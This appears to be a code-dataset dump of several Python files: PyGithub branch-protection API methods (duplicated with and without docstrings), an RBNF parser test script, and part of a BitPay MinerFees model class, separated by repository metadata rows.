def _initAttributes(self):
self._commit = github.GithubObject.NotSet
self._name = github.GithubObject.NotSet
self._protection_url = github.GithubObject.NotSet
self._protected = github.GithubObject.NotSet
def _useAttributes(self, attributes):
if "commit" in attributes: # pragma no branch
self._commit = self._makeClassAttribute(
github.Commit.Commit, attributes["commit"]
)
if "name" in attributes: # pragma no branch
self._name = self._makeStringAttribute(attributes["name"])
if "protection_url" in attributes: # pragma no branch
self._protection_url = self._makeStringAttribute(
attributes["protection_url"]
)
if "protected" in attributes: # pragma no branch
self._protected = self._makeBoolAttribute(attributes["protected"])
def get_protection(self):
"""
:calls: `GET /repos/:owner/:repo/branches/:branch/protection <https://developer.github.com/v3/repos/branches>`_
"""
headers, data = self._requester.requestJsonAndCheck(
"GET",
self.protection_url,
headers={"Accept": Consts.mediaTypeRequireMultipleApprovingReviews},
)
return github.BranchProtection.BranchProtection(
self._requester, headers, data, completed=True
)
def edit_protection(
self,
strict=github.GithubObject.NotSet,
contexts=github.GithubObject.NotSet,
enforce_admins=github.GithubObject.NotSet,
dismissal_users=github.GithubObject.NotSet,
dismissal_teams=github.GithubObject.NotSet,
dismiss_stale_reviews=github.GithubObject.NotSet,
require_code_owner_reviews=github.GithubObject.NotSet,
required_approving_review_count=github.GithubObject.NotSet,
user_push_restrictions=github.GithubObject.NotSet,
team_push_restrictions=github.GithubObject.NotSet,
):
"""
:calls: `PUT /repos/:owner/:repo/branches/:branch/protection <https://developer.github.com/v3/repos/branches>`_
:strict: bool
:contexts: list of strings
:enforce_admins: bool
:dismissal_users: list of strings
:dismissal_teams: list of strings
:dismiss_stale_reviews: bool
:require_code_owner_reviews: bool
:required_approving_review_count: int
:user_push_restrictions: list of strings
:team_push_restrictions: list of strings
NOTE: The GitHub API groups strict and contexts together, both must
be submitted. Take care to pass both as arguments even if only one is
changing. Use edit_required_status_checks() to avoid this.
"""
assert strict is github.GithubObject.NotSet or isinstance(strict, bool), strict
assert contexts is github.GithubObject.NotSet or all(
isinstance(element, str) for element in contexts
), contexts
assert enforce_admins is github.GithubObject.NotSet or isinstance(
enforce_admins, bool
), enforce_admins
assert dismissal_users is github.GithubObject.NotSet or all(
isinstance(element, str) for element in dismissal_users
), dismissal_users
assert dismissal_teams is github.GithubObject.NotSet or all(
isinstance(element, str) for element in dismissal_teams
), dismissal_teams
assert dismiss_stale_reviews is github.GithubObject.NotSet or isinstance(
dismiss_stale_reviews, bool
), dismiss_stale_reviews
assert require_code_owner_reviews is github.GithubObject.NotSet or isinstance(
require_code_owner_reviews, bool
), require_code_owner_reviews
assert (
required_approving_review_count is github.GithubObject.NotSet
or isinstance(required_approving_review_count, int)
), (required_approving_review_count)
post_parameters = {}
if (
strict is not github.GithubObject.NotSet
or contexts is not github.GithubObject.NotSet
):
if strict is github.GithubObject.NotSet:
strict = False
if contexts is github.GithubObject.NotSet:
contexts = []
post_parameters["required_status_checks"] = {
"strict": strict,
"contexts": contexts,
}
else:
post_parameters["required_status_checks"] = None
if enforce_admins is not github.GithubObject.NotSet:
post_parameters["enforce_admins"] = enforce_admins
else:
post_parameters["enforce_admins"] = None
if (
dismissal_users is not github.GithubObject.NotSet
or dismissal_teams is not github.GithubObject.NotSet
or dismiss_stale_reviews is not github.GithubObject.NotSet
or require_code_owner_reviews is not github.GithubObject.NotSet
or required_approving_review_count is not github.GithubObject.NotSet
):
post_parameters["required_pull_request_reviews"] = {}
if dismiss_stale_reviews is not github.GithubObject.NotSet:
post_parameters["required_pull_request_reviews"][
"dismiss_stale_reviews"
] = dismiss_stale_reviews
if require_code_owner_reviews is not github.GithubObject.NotSet:
post_parameters["required_pull_request_reviews"][
"require_code_owner_reviews"
] = require_code_owner_reviews
if required_approving_review_count is not github.GithubObject.NotSet:
post_parameters["required_pull_request_reviews"][
"required_approving_review_count"
] = required_approving_review_count
if dismissal_users is not github.GithubObject.NotSet:
post_parameters["required_pull_request_reviews"][
"dismissal_restrictions"
] = {"users": dismissal_users}
if dismissal_teams is not github.GithubObject.NotSet:
if (
"dismissal_restrictions"
not in post_parameters["required_pull_request_reviews"]
):
post_parameters["required_pull_request_reviews"][
"dismissal_restrictions"
] = {}
post_parameters["required_pull_request_reviews"][
"dismissal_restrictions"
]["teams"] = dismissal_teams
else:
post_parameters["required_pull_request_reviews"] = None
if (
user_push_restrictions is not github.GithubObject.NotSet
or team_push_restrictions is not github.GithubObject.NotSet
):
if user_push_restrictions is github.GithubObject.NotSet:
user_push_restrictions = []
if team_push_restrictions is github.GithubObject.NotSet:
team_push_restrictions = []
post_parameters["restrictions"] = {
"users": user_push_restrictions,
"teams": team_push_restrictions,
}
else:
post_parameters["restrictions"] = None
headers, data = self._requester.requestJsonAndCheck(
"PUT",
self.protection_url,
headers={"Accept": Consts.mediaTypeRequireMultipleApprovingReviews},
input=post_parameters,
)
def remove_protection(self):
"""
:calls: `DELETE /repos/:owner/:repo/branches/:branch/protection <https://developer.github.com/v3/repos/branches>`_
"""
headers, data = self._requester.requestJsonAndCheck(
"DELETE",
self.protection_url,
)
def get_required_status_checks(self):
"""
:calls: `GET /repos/:owner/:repo/branches/:branch/protection/required_status_checks <https://developer.github.com/v3/repos/branches>`_
:rtype: :class:`github.RequiredStatusChecks.RequiredStatusChecks`
"""
headers, data = self._requester.requestJsonAndCheck(
"GET", self.protection_url + "/required_status_checks"
)
return github.RequiredStatusChecks.RequiredStatusChecks(
self._requester, headers, data, completed=True
)
def edit_required_status_checks(
self, strict=github.GithubObject.NotSet, contexts=github.GithubObject.NotSet
):
"""
:calls: `PATCH /repos/:owner/:repo/branches/:branch/protection/required_status_checks <https://developer.github.com/v3/repos/branches>`_
:strict: bool
:contexts: list of strings
"""
assert strict is github.GithubObject.NotSet or isinstance(strict, bool), strict
assert contexts is github.GithubObject.NotSet or all(
isinstance(element, str) for element in contexts
), contexts
post_parameters = {}
if strict is not github.GithubObject.NotSet:
post_parameters["strict"] = strict
if contexts is not github.GithubObject.NotSet:
post_parameters["contexts"] = contexts
headers, data = self._requester.requestJsonAndCheck(
"PATCH",
self.protection_url + "/required_status_checks",
input=post_parameters,
)
def remove_required_status_checks(self):
"""
:calls: `DELETE /repos/:owner/:repo/branches/:branch/protection/required_status_checks <https://developer.github.com/v3/repos/branches>`_
"""
headers, data = self._requester.requestJsonAndCheck(
"DELETE", self.protection_url + "/required_status_checks"
)
def get_required_pull_request_reviews(self):
"""
:calls: `GET /repos/:owner/:repo/branches/:branch/protection/required_pull_request_reviews <https://developer.github.com/v3/repos/branches>`_
:rtype: :class:`github.RequiredPullRequestReviews.RequiredPullRequestReviews`
"""
headers, data = self._requester.requestJsonAndCheck(
"GET",
self.protection_url + "/required_pull_request_reviews",
headers={"Accept": Consts.mediaTypeRequireMultipleApprovingReviews},
)
return github.RequiredPullRequestReviews.RequiredPullRequestReviews(
self._requester, headers, data, completed=True
)
def edit_required_pull_request_reviews(
self,
dismissal_users=github.GithubObject.NotSet,
dismissal_teams=github.GithubObject.NotSet,
dismiss_stale_reviews=github.GithubObject.NotSet,
require_code_owner_reviews=github.GithubObject.NotSet,
required_approving_review_count=github.GithubObject.NotSet,
):
"""
:calls: `PATCH /repos/:owner/:repo/branches/:branch/protection/required_pull_request_reviews <https://developer.github.com/v3/repos/branches>`_
:dismissal_users: list of strings
:dismissal_teams: list of strings
:dismiss_stale_reviews: bool
:require_code_owner_reviews: bool
:required_approving_review_count: int
"""
assert dismissal_users is github.GithubObject.NotSet or all(
isinstance(element, str) for element in dismissal_users
), dismissal_users
assert dismissal_teams is github.GithubObject.NotSet or all(
isinstance(element, str) for element in dismissal_teams
), dismissal_teams
assert dismiss_stale_reviews is github.GithubObject.NotSet or isinstance(
dismiss_stale_reviews, bool
), dismiss_stale_reviews
assert require_code_owner_reviews is github.GithubObject.NotSet or isinstance(
require_code_owner_reviews, bool
), require_code_owner_reviews
assert (
required_approving_review_count is github.GithubObject.NotSet
or isinstance(required_approving_review_count, int)
), (required_approving_review_count)
post_parameters = {}
if dismissal_users is not github.GithubObject.NotSet:
post_parameters["dismissal_restrictions"] = {"users": dismissal_users}
if dismissal_teams is not github.GithubObject.NotSet:
if "dismissal_restrictions" not in post_parameters:
post_parameters["dismissal_restrictions"] = {}
post_parameters["dismissal_restrictions"]["teams"] = dismissal_teams
if dismiss_stale_reviews is not github.GithubObject.NotSet:
post_parameters["dismiss_stale_reviews"] = dismiss_stale_reviews
if require_code_owner_reviews is not github.GithubObject.NotSet:
post_parameters["require_code_owner_reviews"] = require_code_owner_reviews
if required_approving_review_count is not github.GithubObject.NotSet:
post_parameters[
"required_approving_review_count"
] = required_approving_review_count
headers, data = self._requester.requestJsonAndCheck(
"PATCH",
self.protection_url + "/required_pull_request_reviews",
headers={"Accept": Consts.mediaTypeRequireMultipleApprovingReviews},
input=post_parameters,
)
def remove_required_pull_request_reviews(self):
"""
:calls: `DELETE /repos/:owner/:repo/branches/:branch/protection/required_pull_request_reviews <https://developer.github.com/v3/repos/branches>`_
"""
headers, data = self._requester.requestJsonAndCheck(
"DELETE", self.protection_url + "/required_pull_request_reviews"
)
def get_admin_enforcement(self):
"""
:calls: `GET /repos/:owner/:repo/branches/:branch/protection/enforce_admins <https://developer.github.com/v3/repos/branches>`_
:rtype: bool
"""
headers, data = self._requester.requestJsonAndCheck(
"GET", self.protection_url + "/enforce_admins"
)
return data["enabled"]
def set_admin_enforcement(self):
"""
:calls: `POST /repos/:owner/:repo/branches/:branch/protection/enforce_admins <https://developer.github.com/v3/repos/branches>`_
"""
headers, data = self._requester.requestJsonAndCheck(
"POST", self.protection_url + "/enforce_admins"
)
def remove_admin_enforcement(self):
"""
:calls: `DELETE /repos/:owner/:repo/branches/:branch/protection/enforce_admins <https://developer.github.com/v3/repos/branches>`_
"""
headers, data = self._requester.requestJsonAndCheck(
"DELETE", self.protection_url + "/enforce_admins"
)
def get_user_push_restrictions(self):
"""
:calls: `GET /repos/:owner/:repo/branches/:branch/protection/restrictions/users <https://developer.github.com/v3/repos/branches>`_
:rtype: :class:`github.PaginatedList.PaginatedList` of :class:`github.NamedUser.NamedUser`
"""
return github.PaginatedList.PaginatedList(
github.NamedUser.NamedUser,
self._requester,
self.protection_url + "/restrictions/users",
None,
)
def get_team_push_restrictions(self):
"""
:calls: `GET /repos/:owner/:repo/branches/:branch/protection/restrictions/teams <https://developer.github.com/v3/repos/branches>`_
:rtype: :class:`github.PaginatedList.PaginatedList` of :class:`github.Team.Team`
"""
return github.PaginatedList.PaginatedList(
github.Team.Team,
self._requester,
self.protection_url + "/restrictions/teams",
None,
)
def add_user_push_restrictions(self, *users):
"""
:calls: `POST /repos/:owner/:repo/branches/:branch/protection/restrictions/users <https://developer.github.com/v3/repos/branches>`_
:users: list of strings (user names)
"""
assert all(isinstance(element, str) for element in users), users
headers, data = self._requester.requestJsonAndCheck(
"POST", self.protection_url + "/restrictions/users", input=users
)
def replace_user_push_restrictions(self, *users):
"""
:calls: `PUT /repos/:owner/:repo/branches/:branch/protection/restrictions/users <https://developer.github.com/v3/repos/branches>`_
:users: list of strings (user names)
"""
assert all(isinstance(element, str) for element in users), users
headers, data = self._requester.requestJsonAndCheck(
"PUT", self.protection_url + "/restrictions/users", input=users
)
def remove_user_push_restrictions(self, *users):
"""
:calls: `DELETE /repos/:owner/:repo/branches/:branch/protection/restrictions/users <https://developer.github.com/v3/repos/branches>`_
:users: list of strings (user names)
"""
assert all(isinstance(element, str) for element in users), users
headers, data = self._requester.requestJsonAndCheck(
"DELETE", self.protection_url + "/restrictions/users", input=users
)
def add_team_push_restrictions(self, *teams):
"""
:calls: `POST /repos/:owner/:repo/branches/:branch/protection/restrictions/teams <https://developer.github.com/v3/repos/branches>`_
:teams: list of strings (team slugs)
"""
assert all(isinstance(element, str) for element in teams), teams
headers, data = self._requester.requestJsonAndCheck(
"POST", self.protection_url + "/restrictions/teams", input=teams
)
def replace_team_push_restrictions(self, *teams):
"""
:calls: `PUT /repos/:owner/:repo/branches/:branch/protection/restrictions/teams <https://developer.github.com/v3/repos/branches>`_
:teams: list of strings (team slugs)
"""
assert all(isinstance(element, str) for element in teams), teams
headers, data = self._requester.requestJsonAndCheck(
"PUT", self.protection_url + "/restrictions/teams", input=teams
)
def remove_team_push_restrictions(self, *teams):
"""
:calls: `DELETE /repos/:owner/:repo/branches/:branch/protection/restrictions/teams <https://developer.github.com/v3/repos/branches>`_
:teams: list of strings (team slugs)
"""
assert all(isinstance(element, str) for element in teams), teams
headers, data = self._requester.requestJsonAndCheck(
"DELETE", self.protection_url + "/restrictions/teams", input=teams
)
def remove_push_restrictions(self):
"""
:calls: `DELETE /repos/:owner/:repo/branches/:branch/protection/restrictions <https://developer.github.com/v3/repos/branches>`_
"""
headers, data = self._requester.requestJsonAndCheck(
"DELETE", self.protection_url + "/restrictions"
)
def get_required_signatures(self):
"""
:calls: `GET /repos/:owner/:repo/branches/:branch/protection/required_signatures <https://developer.github.com/v3/repos/branches>`
"""
headers, data = self._requester.requestJsonAndCheck(
"GET",
self.protection_url + "/required_signatures",
headers={"Accept": Consts.signaturesProtectedBranchesPreview},
)
return data["enabled"]
def add_required_signatures(self):
"""
:calls: `POST /repos/:owner/:repo/branches/:branch/protection/required_signatures <https://developer.github.com/v3/repos/branches>`
"""
headers, data = self._requester.requestJsonAndCheck(
"POST",
self.protection_url + "/required_signatures",
headers={"Accept": Consts.signaturesProtectedBranchesPreview},
)
def remove_required_signatures(self):
"""
:calls: `DELETE /repos/:owner/:repo/branches/:branch/protection/required_signatures <https://developer.github.com/v3/repos/branches>`
"""
headers, data = self._requester.requestJsonAndCheck(
"DELETE",
self.protection_url + "/required_signatures",
headers={"Accept": Consts.signaturesProtectedBranchesPreview},
)
| 45.064151 | 152 | 0.624058 | not github.GithubObject.NotSet:
post_parameters["required_pull_request_reviews"][
"required_approving_review_count"
] = required_approving_review_count
if dismissal_users is not github.GithubObject.NotSet:
post_parameters["required_pull_request_reviews"][
"dismissal_restrictions"
] = {"users": dismissal_users}
if dismissal_teams is not github.GithubObject.NotSet:
if (
"dismissal_restrictions"
not in post_parameters["required_pull_request_reviews"]
):
post_parameters["required_pull_request_reviews"][
"dismissal_restrictions"
] = {}
post_parameters["required_pull_request_reviews"][
"dismissal_restrictions"
]["teams"] = dismissal_teams
else:
post_parameters["required_pull_request_reviews"] = None
if (
user_push_restrictions is not github.GithubObject.NotSet
or team_push_restrictions is not github.GithubObject.NotSet
):
if user_push_restrictions is github.GithubObject.NotSet:
user_push_restrictions = []
if team_push_restrictions is github.GithubObject.NotSet:
team_push_restrictions = []
post_parameters["restrictions"] = {
"users": user_push_restrictions,
"teams": team_push_restrictions,
}
else:
post_parameters["restrictions"] = None
headers, data = self._requester.requestJsonAndCheck(
"PUT",
self.protection_url,
headers={"Accept": Consts.mediaTypeRequireMultipleApprovingReviews},
input=post_parameters,
)
def remove_protection(self):
headers, data = self._requester.requestJsonAndCheck(
"DELETE",
self.protection_url,
)
def get_required_status_checks(self):
headers, data = self._requester.requestJsonAndCheck(
"GET", self.protection_url + "/required_status_checks"
)
return github.RequiredStatusChecks.RequiredStatusChecks(
self._requester, headers, data, completed=True
)
def edit_required_status_checks(
self, strict=github.GithubObject.NotSet, contexts=github.GithubObject.NotSet
):
assert strict is github.GithubObject.NotSet or isinstance(strict, bool), strict
assert contexts is github.GithubObject.NotSet or all(
isinstance(element, str) for element in contexts
), contexts
post_parameters = {}
if strict is not github.GithubObject.NotSet:
post_parameters["strict"] = strict
if contexts is not github.GithubObject.NotSet:
post_parameters["contexts"] = contexts
headers, data = self._requester.requestJsonAndCheck(
"PATCH",
self.protection_url + "/required_status_checks",
input=post_parameters,
)
def remove_required_status_checks(self):
headers, data = self._requester.requestJsonAndCheck(
"DELETE", self.protection_url + "/required_status_checks"
)
def get_required_pull_request_reviews(self):
headers, data = self._requester.requestJsonAndCheck(
"GET",
self.protection_url + "/required_pull_request_reviews",
headers={"Accept": Consts.mediaTypeRequireMultipleApprovingReviews},
)
return github.RequiredPullRequestReviews.RequiredPullRequestReviews(
self._requester, headers, data, completed=True
)
def edit_required_pull_request_reviews(
self,
dismissal_users=github.GithubObject.NotSet,
dismissal_teams=github.GithubObject.NotSet,
dismiss_stale_reviews=github.GithubObject.NotSet,
require_code_owner_reviews=github.GithubObject.NotSet,
required_approving_review_count=github.GithubObject.NotSet,
):
assert dismissal_users is github.GithubObject.NotSet or all(
isinstance(element, str) for element in dismissal_users
), dismissal_users
assert dismissal_teams is github.GithubObject.NotSet or all(
isinstance(element, str) for element in dismissal_teams
), dismissal_teams
assert dismiss_stale_reviews is github.GithubObject.NotSet or isinstance(
dismiss_stale_reviews, bool
), dismiss_stale_reviews
assert require_code_owner_reviews is github.GithubObject.NotSet or isinstance(
require_code_owner_reviews, bool
), require_code_owner_reviews
assert (
required_approving_review_count is github.GithubObject.NotSet
or isinstance(required_approving_review_count, int)
), (required_approving_review_count)
post_parameters = {}
if dismissal_users is not github.GithubObject.NotSet:
post_parameters["dismissal_restrictions"] = {"users": dismissal_users}
if dismissal_teams is not github.GithubObject.NotSet:
if "dismissal_restrictions" not in post_parameters:
post_parameters["dismissal_restrictions"] = {}
post_parameters["dismissal_restrictions"]["teams"] = dismissal_teams
if dismiss_stale_reviews is not github.GithubObject.NotSet:
post_parameters["dismiss_stale_reviews"] = dismiss_stale_reviews
if require_code_owner_reviews is not github.GithubObject.NotSet:
post_parameters["require_code_owner_reviews"] = require_code_owner_reviews
if required_approving_review_count is not github.GithubObject.NotSet:
post_parameters[
"required_approving_review_count"
] = required_approving_review_count
headers, data = self._requester.requestJsonAndCheck(
"PATCH",
self.protection_url + "/required_pull_request_reviews",
headers={"Accept": Consts.mediaTypeRequireMultipleApprovingReviews},
input=post_parameters,
)
def remove_required_pull_request_reviews(self):
headers, data = self._requester.requestJsonAndCheck(
"DELETE", self.protection_url + "/required_pull_request_reviews"
)
def get_admin_enforcement(self):
headers, data = self._requester.requestJsonAndCheck(
"GET", self.protection_url + "/enforce_admins"
)
return data["enabled"]
def set_admin_enforcement(self):
headers, data = self._requester.requestJsonAndCheck(
"POST", self.protection_url + "/enforce_admins"
)
def remove_admin_enforcement(self):
headers, data = self._requester.requestJsonAndCheck(
"DELETE", self.protection_url + "/enforce_admins"
)
def get_user_push_restrictions(self):
return github.PaginatedList.PaginatedList(
github.NamedUser.NamedUser,
self._requester,
self.protection_url + "/restrictions/users",
None,
)
def get_team_push_restrictions(self):
return github.PaginatedList.PaginatedList(
github.Team.Team,
self._requester,
self.protection_url + "/restrictions/teams",
None,
)
def add_user_push_restrictions(self, *users):
assert all(isinstance(element, str) for element in users), users
headers, data = self._requester.requestJsonAndCheck(
"POST", self.protection_url + "/restrictions/users", input=users
)
def replace_user_push_restrictions(self, *users):
assert all(isinstance(element, str) for element in users), users
headers, data = self._requester.requestJsonAndCheck(
"PUT", self.protection_url + "/restrictions/users", input=users
)
def remove_user_push_restrictions(self, *users):
assert all(isinstance(element, str) for element in users), users
headers, data = self._requester.requestJsonAndCheck(
"DELETE", self.protection_url + "/restrictions/users", input=users
)
def add_team_push_restrictions(self, *teams):
assert all(isinstance(element, str) for element in teams), teams
headers, data = self._requester.requestJsonAndCheck(
"POST", self.protection_url + "/restrictions/teams", input=teams
)
def replace_team_push_restrictions(self, *teams):
assert all(isinstance(element, str) for element in teams), teams
headers, data = self._requester.requestJsonAndCheck(
"PUT", self.protection_url + "/restrictions/teams", input=teams
)
def remove_team_push_restrictions(self, *teams):
assert all(isinstance(element, str) for element in teams), teams
headers, data = self._requester.requestJsonAndCheck(
"DELETE", self.protection_url + "/restrictions/teams", input=teams
)
def remove_push_restrictions(self):
headers, data = self._requester.requestJsonAndCheck(
"DELETE", self.protection_url + "/restrictions"
)
def get_required_signatures(self):
headers, data = self._requester.requestJsonAndCheck(
"GET",
self.protection_url + "/required_signatures",
headers={"Accept": Consts.signaturesProtectedBranchesPreview},
)
return data["enabled"]
def add_required_signatures(self):
headers, data = self._requester.requestJsonAndCheck(
"POST",
self.protection_url + "/required_signatures",
headers={"Accept": Consts.signaturesProtectedBranchesPreview},
)
def remove_required_signatures(self):
headers, data = self._requester.requestJsonAndCheck(
"DELETE",
self.protection_url + "/required_signatures",
headers={"Accept": Consts.signaturesProtectedBranchesPreview},
)
| true | true |
f72330d9504ba308986c3e2411b493ad3990f2b7 | 4,451 | py | Python | test/test.py | thautwarm/RBNF.hs | c95838e68d5121b9e9661cc726cd1752345b3f53 | [
"BSD-3-Clause"
] | 7 | 2019-03-01T16:02:05.000Z | 2022-01-18T09:56:23.000Z | test/test.py | thautwarm/RBNF.hs | c95838e68d5121b9e9661cc726cd1752345b3f53 | [
"BSD-3-Clause"
] | 5 | 2019-07-12T08:59:46.000Z | 2020-01-08T14:50:01.000Z | test/test.py | thautwarm/RBNF.hs | c95838e68d5121b9e9661cc726cd1752345b3f53 | [
"BSD-3-Clause"
] | null | null | null | import sys
import operator
from dataclasses import dataclass
from collections import OrderedDict
from typing import Generic, TypeVar
T = TypeVar('T')
nil = None
class Nil:
def __init__(self):
global nil
if nil is None:
nil = self
return
raise ValueError("Nil cannot get instantiated twice.")
def __len__(self):
return 0
def __getitem__(self, n):
raise IndexError('Out of bounds')
@property
def head(self):
raise IndexError('Out of bounds')
@property
def tail(self):
raise IndexError('Out of bounds')
def __repr__(self):
return "[]"
Nil()
class Cons:
def __init__(self, _head, _tail):
self.head = _head
self.tail = _tail
def __len__(self):
_nil = nil
l = 0
while self is not _nil:
l += 1
self = self.tail
return l
def __iter__(self):
_nil = nil
while self is not _nil:
yield self.head
self = self.tail
def __getitem__(self, n):
while n != 0:
self = self.tail
return self.head
def __repr__(self):
return repr(list(self))
# ast=. {}
# linkedlist=a. {}
# tokens=. {offset:int}
# prim__eq::forall a. (a * a) -> bool
# prim__not__eq::forall a. (a * a) -> bool
# prim__null::forall a. a
# prim__peekable::(tokens * int) -> bool
# prim__peek::(tokens * int) -> token
# prim__match__tk::(tokens * int) -> ast
# prim__tk__id::str -> int
# prim__reset::(tokens * int) -> ()
# prim__cons::forall a. (a * linkedlist a) -> linkedlist a
# prim__nil::forall a. linkedlist a
# prim__to__errs::any -> linkedlist (int * str)
# prim__to__result::any -> ast
# prim__to__any::forall a. a -> any
# prim__mk__ast::forall a. (str * a) -> ast
# prim__is__null::forall a. a -> bool
# always__true::State -> bool
@dataclass
class Token:
idint: int
prim__eq = operator.eq
prim__not__eq = operator.ne
prim__null = None
def prim__peekable(tokens, i):
return len(tokens.array) > tokens.offset + i
def prim__peek(tokens, i):
return tokens.array[tokens.offset + i]
def prim__match__tk(tokens, idint):
# print(tokens.offset)
try:
tk = tokens.array[tokens.offset]
except IndexError:
return None
if tk.idint is idint:
tokens.offset += 1
return tk
class Count(OrderedDict):
def __missing__(self, k):
v = self[k] = len(self)
return v
token_cnt = Count()
def prim__tk__id(s):
return token_cnt[s]
def prim__reset(tokens, i):
tokens.offset = i
prim__cons = Cons
prim__nil = nil
def prim__to__result(x):
return x
def prim__to__any(x): return x
@dataclass
class AST(Generic[T]):
tag: str
content: T
def prim__mk__ast(s, x): return AST(s, x)
def prim__is__null(x): return x is None
def prim__is__not__null(x): return x is not None
def always__true(s): return True
class Tokens:
def __init__(self, array):
self.array = array
self.offset = 0
with open("./gen.py") as f:
exec(f.read(), globals())
bT = Token(token_cnt["b"])
tokens = Tokens([bT] * 4)
assert parse_B(None, tokens) == AST(
tag='B',
content=(
(AST(
tag='B',
content=(
(AST(tag='B',
content=((
AST(tag='B',
content=(Token(idint=0),)),
Token(idint=0)),)),
Token(idint=0)),)),
Token(idint=0)),))
@dataclass
class Mul:
lhs: object
op: object
rhs: object
one = 1
zero = 0
add = operator.add
with open("./gen2.py") as f:
exec(f.read(), globals())
number = Token(token_cnt["number"])
lp = Token(token_cnt["quote ("])
rp = Token(token_cnt["quote )"])
mult = Token(token_cnt["quote *"])
div = Token(token_cnt["quote /"])
tokens = Tokens([
number, mult, number, mult,
lp,
number, mult, number, mult, number,
rp
])
assert parse_Mul(None, tokens) == (True, 5)
tokens = Tokens([
number
])
# print(token_cnt)
assert parse_Mul(None, tokens) == (True, 1)
# True,
# Mul(lhs=Token(idint=1),
# op=Token(idint=5),
# rhs=Mul(
# lhs=Mul(
# lhs=Token(idint=1),
# op=Token(
# idint=4),
# rhs=Token(idint=1)),
# op=Token(idint=5),
# rhs=Token(idint=1)))
# )
| 18.316872 | 62 | 0.571332 | import sys
import operator
from dataclasses import dataclass
from collections import OrderedDict
from typing import Generic, TypeVar
T = TypeVar('T')
nil = None
class Nil:
def __init__(self):
global nil
if nil is None:
nil = self
return
raise ValueError("Nil cannot get instantiated twice.")
def __len__(self):
return 0
def __getitem__(self, n):
raise IndexError('Out of bounds')
@property
def head(self):
raise IndexError('Out of bounds')
@property
def tail(self):
raise IndexError('Out of bounds')
def __repr__(self):
return "[]"
Nil()
class Cons:
def __init__(self, _head, _tail):
self.head = _head
self.tail = _tail
def __len__(self):
_nil = nil
l = 0
while self is not _nil:
l += 1
self = self.tail
return l
def __iter__(self):
_nil = nil
while self is not _nil:
yield self.head
self = self.tail
def __getitem__(self, n):
while n != 0:
self = self.tail
return self.head
def __repr__(self):
return repr(list(self))
@dataclass
class Token:
idint: int
prim__eq = operator.eq
prim__not__eq = operator.ne
prim__null = None
def prim__peekable(tokens, i):
return len(tokens.array) > tokens.offset + i
def prim__peek(tokens, i):
return tokens.array[tokens.offset + i]
def prim__match__tk(tokens, idint):
try:
tk = tokens.array[tokens.offset]
except IndexError:
return None
if tk.idint is idint:
tokens.offset += 1
return tk
class Count(OrderedDict):
def __missing__(self, k):
v = self[k] = len(self)
return v
token_cnt = Count()
def prim__tk__id(s):
return token_cnt[s]
def prim__reset(tokens, i):
tokens.offset = i
prim__cons = Cons
prim__nil = nil
def prim__to__result(x):
return x
def prim__to__any(x): return x
@dataclass
class AST(Generic[T]):
tag: str
content: T
def prim__mk__ast(s, x): return AST(s, x)
def prim__is__null(x): return x is None
def prim__is__not__null(x): return x is not None
def always__true(s): return True
class Tokens:
def __init__(self, array):
self.array = array
self.offset = 0
with open("./gen.py") as f:
exec(f.read(), globals())
bT = Token(token_cnt["b"])
tokens = Tokens([bT] * 4)
assert parse_B(None, tokens) == AST(
tag='B',
content=(
(AST(
tag='B',
content=(
(AST(tag='B',
content=((
AST(tag='B',
content=(Token(idint=0),)),
Token(idint=0)),)),
Token(idint=0)),)),
Token(idint=0)),))
@dataclass
class Mul:
lhs: object
op: object
rhs: object
one = 1
zero = 0
add = operator.add
with open("./gen2.py") as f:
exec(f.read(), globals())
number = Token(token_cnt["number"])
lp = Token(token_cnt["quote ("])
rp = Token(token_cnt["quote )"])
mult = Token(token_cnt["quote *"])
div = Token(token_cnt["quote /"])
tokens = Tokens([
number, mult, number, mult,
lp,
number, mult, number, mult, number,
rp
])
assert parse_Mul(None, tokens) == (True, 5)
tokens = Tokens([
number
])
assert parse_Mul(None, tokens) == (True, 1)
| true | true |
f72331a544aca9c9ac8a9380791189cd9025588f | 4,349 | py | Python | src/bitpay/models/invoice/miner_fees.py | ppatidar2021/python-bitpay-client | b0bd6ef6f2ce2950fb42e6583113e225639a4340 | [
"MIT"
] | 3 | 2022-01-24T17:02:22.000Z | 2022-03-10T00:57:20.000Z | src/bitpay/models/invoice/miner_fees.py | ppatidar2021/python-bitpay-client | b0bd6ef6f2ce2950fb42e6583113e225639a4340 | [
"MIT"
] | 1 | 2022-03-08T03:11:09.000Z | 2022-03-09T12:51:13.000Z | src/bitpay/models/invoice/miner_fees.py | ppatidar2021/python-bitpay-client | b0bd6ef6f2ce2950fb42e6583113e225639a4340 | [
"MIT"
] | 3 | 2021-12-24T05:57:33.000Z | 2022-03-14T09:17:40.000Z | """
MinerFees
"""
from .miner_fees_item import MinerFeesItem
class MinerFees:
"""
The total amount of fees that the purchaser will pay to cover BitPay's
UTXO sweep cost for an invoice. The key is the currency and the value
is an amount in satoshis. This is referenced as "Network Cost" on an
invoice,see this support article for more information
"""
__btc = MinerFeesItem()
__bch = MinerFeesItem()
__eth = MinerFeesItem()
__usdc = MinerFeesItem()
__gusd = MinerFeesItem()
__pax = MinerFeesItem()
__doge = MinerFeesItem()
__ltc = MinerFeesItem()
__busd = MinerFeesItem()
__xrp = MinerFeesItem()
def __init__(self, **kwargs):
for key, value in kwargs.items():
try:
if key in ["BTC", "BCH", "ETH", "USDC", "GUSD", "PAX", "BUSD", "XRP"]:
value = MinerFeesItem(**value)
getattr(self, "set_%s" % key.lower())(value)
except AttributeError:
pass
def get_btc(self):
"""
Get method for the btc
:return: btc
"""
return self.__btc
def set_btc(self, btc: MinerFeesItem):
"""
Set method for the btc
:param btc: btc
"""
self.__btc = btc
def get_bch(self):
"""
Get method for the bch
:return: bch
"""
return self.__bch
def set_bch(self, bch: MinerFeesItem):
"""
Set method for the bch
:param bch: bch
"""
self.__bch = bch
def get_eth(self):
"""
Get method for the eth
:return: eth
"""
return self.__eth
def set_eth(self, eth: MinerFeesItem):
"""
Set method for the eth
:param eth: eth
"""
self.__eth = eth
def get_usdc(self):
"""
Get method for the usdc
:return: usdc
"""
return self.__usdc
def set_usdc(self, usdc: MinerFeesItem):
"""
Set method for the usdc
:param usdc: usdc
"""
self.__usdc = usdc
def get_gusd(self):
"""
Get method for the gusd
:return: gusd
"""
return self.__gusd
def set_gusd(self, gusd: MinerFeesItem):
"""
Set method for the gusd
:param gusd: gusd
"""
self.__gusd = gusd
def get_doge(self):
"""
Get method for the doge
:return: doge
"""
return self.__doge
def set_doge(self, doge: MinerFeesItem):
"""
Set method for the doge
:param doge: doge
"""
self.__doge = doge
def get_ltc(self):
"""
Get method for the ltc
:return: ltc
"""
return self.__ltc
